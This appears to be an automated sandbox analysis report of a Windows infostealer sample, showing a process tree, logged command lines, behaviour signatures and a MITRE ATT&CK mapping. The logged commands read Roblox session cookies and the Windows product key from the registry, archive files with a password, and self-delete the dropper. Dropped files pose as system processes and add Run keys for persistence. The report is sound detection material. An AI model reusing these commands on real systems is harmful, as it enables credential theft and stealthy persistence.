          cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
        [5] PID 4088  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
          [6] PID 4204  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\abavsymn\abavsymn.cmdline"
            [7] PID 1600  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8CA0.tmp" "c:\Users\Admin\AppData\Local\Temp\abavsymn\CSCD625BD24B259407088673FF6AA1ECEEF.TMP"
      [4] PID 1680  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
        [5] PID 4592  C:\Windows\system32\tree.com
            cmdline: tree /A /F
      [4] PID 1296  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        [5] PID 2388  C:\Windows\system32\attrib.exe
            cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts
            signatures: Drops file in Drivers directory; Views/modifies file attributes
      [4] PID 2272  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
        [5] PID 1676  C:\Windows\system32\tree.com
            cmdline: tree /A /F
      [4] PID 560  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        [5] PID 900  C:\Windows\system32\attrib.exe
            cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts
            signatures: Drops file in Drivers directory; Views/modifies file attributes
      [4] PID 4880  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        [5] PID 1924  C:\Windows\system32\tasklist.exe
            cmdline: tasklist /FO LIST
            signatures: Enumerates processes with tasklist
      [4] PID 4644  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
        [5] PID 1756  C:\Windows\system32\tree.com
            cmdline: tree /A /F
      [4] PID 2100  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
        [5] PID 4836  C:\Windows\system32\tree.com
            cmdline: tree /A /F
      [4] PID 2984  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F"
        [5] PID 4912  C:\Windows\system32\tree.com
            cmdline: tree /A /F
      [4] PID 904  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        [5] PID 1212  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            signatures: Suspicious behavior: EnumeratesProcesses
      [4] PID 2964  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        [5] PID 360  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            signatures: Suspicious behavior: EnumeratesProcesses
      [4] PID 3392  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "getmac"
        [5] PID 1476  C:\Windows\system32\getmac.exe
            cmdline: getmac
      [4] PID 4188  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29042\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\3Y54U.zip" *"
        [5] PID 3160  C:\Users\Admin\AppData\Local\Temp\_MEI29042\rar.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\_MEI29042\rar.exe a -r -hp"Tookie57!" "C:\Users\Admin\AppData\Local\Temp\3Y54U.zip" *
            signatures: Executes dropped EXE
      [4] PID 5084  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        [5] PID 3748  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic os get Caption
      [4] PID 3464  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        [5] PID 4608  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic computersystem get totalphysicalmemory
      [4] PID 4220  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        [5] PID 3956  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic csproduct get uuid
      [4] PID 3408  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        [5] PID 4208  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:1456
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1888 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:4460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:1216
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "c:\users\admin\appdata\local\temp\zyron.exe ""4⤵PID:4488
-
C:\Windows\system32\PING.EXEping localhost -n 35⤵
- Runs ping.exe
PID:4376 -
C:\Windows\Resources\Themes\icsys.icn.exeC:\Windows\Resources\Themes\icsys.icn.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3972 -
\??\c:\windows\resources\themes\explorer.exec:\windows\resources\themes\explorer.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4200 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:676 -
\??\c:\windows\resources\svchost.exec:\windows\resources\svchost.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4736 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR6⤵
- Executes dropped EXE
PID:212
Network

MITRE ATT&CK Enterprise v15
- Privilege Escalation
  - Boot or Logon Autostart Execution (1)
    - Registry Run Keys / Startup Folder (1)
- Defense Evasion
  - Hide Artifacts (2)
    - Hidden Files and Directories (2)
  - Modify Registry (2)
Downloads